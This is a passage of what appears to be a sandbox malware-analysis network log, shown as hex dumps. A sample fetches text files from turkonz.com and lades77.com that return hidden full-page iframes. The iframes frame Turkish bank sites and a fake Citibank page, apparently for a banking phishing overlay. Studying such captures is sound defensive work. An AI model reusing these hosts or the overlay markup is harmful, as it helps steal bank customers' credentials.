3039 2031 313a 3031 3a33 3620 474d 540d    09 11:01:36 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 796b 7576 2e74 7874              /js/ykuv.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6b75    GET /img/jpg/yku
762e 7478 7420 4854 5450 2f31 2e31 0d0a    v.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a35 3020 474d 540d 0a41 6363    4:23:50 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3161 3161 3564    s..ETag: "1a1a5d
3634 3132 3764 6339 313a 6164 3966 6322    64127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3620 474d 540d    09 11:01:36 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 796b 7576 2e74 7874              /js/ykuv.txt

from ANUBIS:1051 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 743

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6b75 762e 7478 7420 4854 5450 2f31 2e31    kuv.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3337    ar 2009 11:01:37
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3231    an 2009 04:15:21
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 362d 3139 382d 3436 3131 6561 3332    056-198-4611ea32
3730 3834 3022 0d0a 4163 6365 7074 2d52    70840"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
380d 0a43 6f6e 7465 6e74 2d54 7970 653a    8..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6b75 7665 7974 7475 726b 2e63 6f6d 2f74    kuveytturk.com/t
722f 6465 6661 756c 742e 6173 7078 2220    r/default.aspx" 
0d0a 7769 6474 683d 3130 3025 0d0a 6865    ..width=100%..he
6967 6874 3d31 3030 2520 206d 6172 6769    ight=100%  margi
6e68 6569 6768 743d 2230 2220 6d61 7267    nheight="0" marg
696e 7769 6474 683d 2230 2220 2073 6372    inwidth="0"  scr
6f6c 6c69 6e67 3d22 6e6f 2220 0d0a 626f    olling="no" ..bo
7264 6572 3d22 3022 200d 0a66 7261 6d65    rder="0" ..frame
626f 7264 6572 3d22 3022 200d 0a74 6f70    border="0" ..top
3d22 3022 206c 6566 743d 2230 223e 0d0a    ="0" left="0">..
596f 7572 2062 726f 7773 6572 2064 6f65    Your browser doe
7320 6e6f 7420 7375 7070 6f72 7420 696e    s not support in
6c69 6e65 2066 7261 6d65 7320 6f72 2069    line frames or i
7320 6375 7272 656e 746c 7920 636f 6e66    s currently conf
6967 7572 6564 200d 0a6e 6f74 2074 6f20    igured ..not to 
6469 7370 6c61 7920 696e 6c69 6e65 2066    display inline f
7261 6d65 732e 0d0a 3c2f 4946 5241 4d45    rames...</IFRAME
3e3c 2f64 6976 3e                          ></div>

from ANUBIS:1052 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6369    GET /img/jpg/yci
742e 7478 7420 4854 5450 2f31 2e31 0d0a    t.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a34 3620 474d 540d 0a41 6363    4:22:46 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6532 6464 3161    s..ETag: "e2dd1a
3365 3132 3764 6339 313a 6164 3966 6322    3e127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3820 474d 540d    09 11:01:38 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7963 6974 2e74 7874              /js/ycit.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6369    GET /img/jpg/yci
742e 7478 7420 4854 5450 2f31 2e31 0d0a    t.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a34 3620 474d 540d 0a41 6363    4:22:46 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6532 6464 3161    s..ETag: "e2dd1a
3365 3132 3764 6339 313a 6164 3966 6322    3e127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a33 3820 474d 540d    09 11:01:38 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7963 6974 2e74 7874              /js/ycit.txt

from ANUBIS:1053 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 750

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6369 742e 7478 7420 4854 5450 2f31 2e31    cit.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3430    ar 2009 11:01:40
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2053 756e 2c20 3135 204d    ified: Sun, 15 M
6172 2032 3030 3920 3138 3a35 353a 3532    ar 2009 18:55:52
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 622d 3139 662d 3436 3532 6365 3230    04b-19f-4652ce20
3833 6530 3022 0d0a 4163 6365 7074 2d52    83e00"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
350d 0a43 6f6e 7465 6e74 2d54 7970 653a    5..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6f6e 6c69 6e65 6973 6c65 6d6c 6572 2e6f    onlineislemler.o
7267 2f63 6974 6962 616e 6b2f 696e 6465    rg/citibank/inde
782e 7068 7022 200d 0a77 6964 7468 3d31    x.php" ..width=1
3030 250d 0a68 6569 6768 743d 3130 3025    00%..height=100%
2020 6d61 7267 696e 6865 6967 6874 3d22      marginheight="
3022 206d 6172 6769 6e77 6964 7468 3d22    0" marginwidth="
3022 2020 7363 726f 6c6c 696e 673d 226e    0"  scrolling="n
6f22 200d 0a62 6f72 6465 723d 2230 2220    o" ..border="0" 
0d0a 6672 616d 6562 6f72 6465 723d 2230    ..frameborder="0
2220 0d0a 746f 703d 2230 2220 6c65 6674    " ..top="0" left
3d22 3022 3e0d 0a59 6f75 7220 6272 6f77    ="0">..Your brow
7365 7220 646f 6573 206e 6f74 2073 7570    ser does not sup
706f 7274 2069 6e6c 696e 6520 6672 616d    port inline fram
6573 206f 7220 6973 2063 7572 7265 6e74    es or is current
6c79 2063 6f6e 6669 6775 7265 6420 0d0a    ly configured ..
6e6f 7420 746f 2064 6973 706c 6179 2069    not to display i
6e6c 696e 6520 6672 616d 6573 2e0d 0a3c    nline frames...<
2f49 4652 414d 453e 3c2f 6469 763e         /IFRAME></div>

from ANUBIS:1054 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616e    GET /img/jpg/yan
612e 7478 7420 4854 5450 2f31 2e31 0d0a    a.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a30 3520 474d 540d 0a41 6363    4:22:05 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6361 3463 6234    s..ETag: "ca4cb4
3235 3132 3764 6339 313a 6164 3966 6322    25127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a34 3020 474d 540d    09 11:01:40 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6e61 2e74 7874              /js/yana.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616e    GET /img/jpg/yan
612e 7478 7420 4854 5450 2f31 2e31 0d0a    a.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a30 3520 474d 540d 0a41 6363    4:22:05 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6361 3463 6234    s..ETag: "ca4cb4
3235 3132 3764 6339 313a 6164 3966 6322    25127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a34 3120 474d 540d    09 11:01:41 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6e61 2e74 7874              /js/yana.txt

from ANUBIS:1055 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 749

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
616e 612e 7478 7420 4854 5450 2f31 2e31    ana.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3433    ar 2009 11:01:43
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 323a 3136    an 2009 04:12:16
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 362d 3139 652d 3436 3131 6539 3832    046-19e-4611e982
3032 3830 3022 0d0a 4163 6365 7074 2d52    02800"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
340d 0a43 6f6e 7465 6e74 2d54 7970 653a    4..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
616e 6164 6f6c 7562 616e 6b2e 636f 6d2e    anadolubank.com.
7472 2f63 6f6e 7465 6e74 2f69 6e64 6578    tr/content/index
2e70 6870 2220 0d0a 7769 6474 683d 3130    .php" ..width=10
3025 0d0a 6865 6967 6874 3d31 3030 2520    0%..height=100% 
206d 6172 6769 6e68 6569 6768 743d 2230     marginheight="0
2220 6d61 7267 696e 7769 6474 683d 2230    " marginwidth="0
2220 2073 6372 6f6c 6c69 6e67 3d22 6e6f    "  scrolling="no
2220 0d0a 626f 7264 6572 3d22 3022 200d    " ..border="0" .
0a66 7261 6d65 626f 7264 6572 3d22 3022    .frameborder="0"
200d 0a74 6f70 3d22 3022 206c 6566 743d     ..top="0" left=
2230 223e 0d0a 596f 7572 2062 726f 7773    "0">..Your brows
6572 2064 6f65 7320 6e6f 7420 7375 7070    er does not supp
6f72 7420 696e 6c69 6e65 2066 7261 6d65    ort inline frame
7320 6f72 2069 7320 6375 7272 656e 746c    s or is currentl
7920 636f 6e66 6967 7572 6564 200d 0a6e    y configured ..n
6f74 2074 6f20 6469 7370 6c61 7920 696e    ot to display in
6c69 6e65 2066 7261 6d65 732e 0d0a 3c2f    line frames...</
4946 5241 4d45 3e3c 2f64 6976 3e           IFRAME></div>

from ANUBIS:1056 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 324 - Transferred inbound Bytes: 640

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7475    GET /img/jpg/ytu
726b 6973 682e 7478 7420 4854 5450 2f31    rkish.txt HTTP/1
2e31 0d0a 436f 6e74 656e 742d 5479 7065    .1..Content-Type
3a20 7465 7874 2f68 746d 6c0d 0a48 6f73    : text/html..Hos
743a 2077 7777 2e74 7572 6b6f 6e7a 2e63    t: www.turkonz.c
6f6d 0d0a 4163 6365 7074 3a20 7465 7874    om..Accept: text
2f68 746d 6c2c 202a 2f2a 0d0a 5573 6572    /html, */*..User
2d41 6765 6e74 3a20 4d6f 7a69 6c6c 612f    -Agent: Mozilla/
332e 3020 2863 6f6d 7061 7469 626c 653b    3.0 (compatible;
2049 6e64 7920 4c69 6272 6172 7929 0d0a     Indy Library)..
0d0a                                       ..

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 350d 0a43 6f6e 7465 6e74 2d54 7970     45..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a33 3720 474d 540d 0a41 6363    4:24:37 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6634 3164 3633    s..ETag: "f41d63
3830 3132 3764 6339 313a 6164 3966 6322    80127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a34 3420 474d 540d    09 11:01:44 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 7572 6b69 7368 2e74 7874

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7475    GET /img/jpg/ytu
726b 6973 682e 7478 7420 4854 5450 2f31    rkish.txt HTTP/1
2e31 0d0a 436f 6e74 656e 742d 5479 7065    .1..Content-Type
3a20 7465 7874 2f68 746d 6c0d 0a48 6f73    : text/html..Hos
743a 2077 7777 2e74 7572 6b6f 6e7a 2e63    t: www.turkonz.c
6f6d 0d0a 4163 6365 7074 3a20 7465 7874    om..Accept: text
2f68 746d 6c2c 202a 2f2a 0d0a 5573 6572    /html, */*..User
2d41 6765 6e74 3a20 4d6f 7a69 6c6c 612f    -Agent: Mozilla/
332e 3020 2863 6f6d 7061 7469 626c 653b    3.0 (compatible;
2049 6e64 7920 4c69 6272 6172 7929 0d0a     Indy Library)..
0d0a                                       ..

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 350d 0a43 6f6e 7465 6e74 2d54 7970     45..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a33 3720 474d 540d 0a41 6363    4:24:37 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6634 3164 3633    s..ETag: "f41d63
3830 3132 3764 6339 313a 6164 3966 6322    80127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
